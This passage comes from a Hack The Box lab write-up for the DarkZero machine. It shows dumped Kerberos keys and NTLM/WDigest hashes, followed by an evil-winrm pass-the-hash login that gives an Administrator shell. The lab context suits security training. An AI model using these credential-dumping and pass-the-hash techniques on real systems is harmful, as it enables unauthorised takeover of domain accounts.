rc4_hmac_nt (4096) : 5917507bdf2ef2c2b0a869a1cba40726
OlderCredentials
des_cbc_md5_nt (4096) : d828032ab803aa2d52a9db423de22fe27af55a9fd2101037b106e856ef515216
unknow (4096) : 5f9f4fbb6a67b92e5ec7b34c3ba9d322
aes256_hmac (4096) : ead37d7deb508c2ad7fd748960cb115d0857b23d95a69cfc95fa693d9d2ca987
aes128_hmac (4096) : d027d6dfa67d37190ea37579b948874a
rc4_hmac_nt (4096) : cf3a5525ee9414229e66279623ed5c58
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 059775b62c039e3def2ae0dd3cf5fdeb
02 cd2cdff8fba2798b8f5736af3b0617e2
03 f807da3ed4e91404a7b9e87915b92114
04 059775b62c039e3def2ae0dd3cf5fdeb
05 3209c6585c69e581da8b23ad280d48aa
06 c75dced3815eff7f99a6ef67018be23e
07 0fca3845bf99227b23ac897eb7e7246d
08 7d1a78d4cc10d91caf276f70790866c2
09 cec6c4e88dbb2e0b2cf3c87ff44cd372
10 81ee716a17e92b26d65b932c55ceaa54
11 5a808b7dd291f85e64e53439a7520d42
12 7d1a78d4cc10d91caf276f70790866c2
13 c421d8af0cfd4330cf4312d05e135127
14 47b49319d1bb83cc2f6fc2767acb9dc6
15 13ad2c29ee304491557ebfef55693708
16 7f8a2135bf0aac335296f86f84660fb0
17 fa7267a1c55c45633b83a34d05f0056f
18 b8f360edd930f882d000d03bc07d0973
19 8ed43db2829682a63b52f73037ea654b
20 276189d18309b00e3e36f4fc3b936677
21 1726c96c2c2998836f09fe572eada8d9
22 bdbd5d774b16233eab9c00804b12601a
23 9131f6686281d29fc473b940d1a1c022
24 2e1e69803702ba4e530debd3b5d5ee74
25 1b79e43d6f356574fdab541ec4ebe0b8
26 e64552e3066c37621f8a7132b64b3a15
27 bd8a3360652182c95cbc4c54553f330f
28 9e10974f986144193c8499681c658880
29 61c17ed3d006e5d2d56c2b2f86e0bdd2
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ evil-winrm -i 10.129.174.93 -u Administrator -H 5917507bdf2ef2c2b0a869a1cba40726
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
- The Season 9 - DarkZero Machine on Hack-The-Box was now complete.
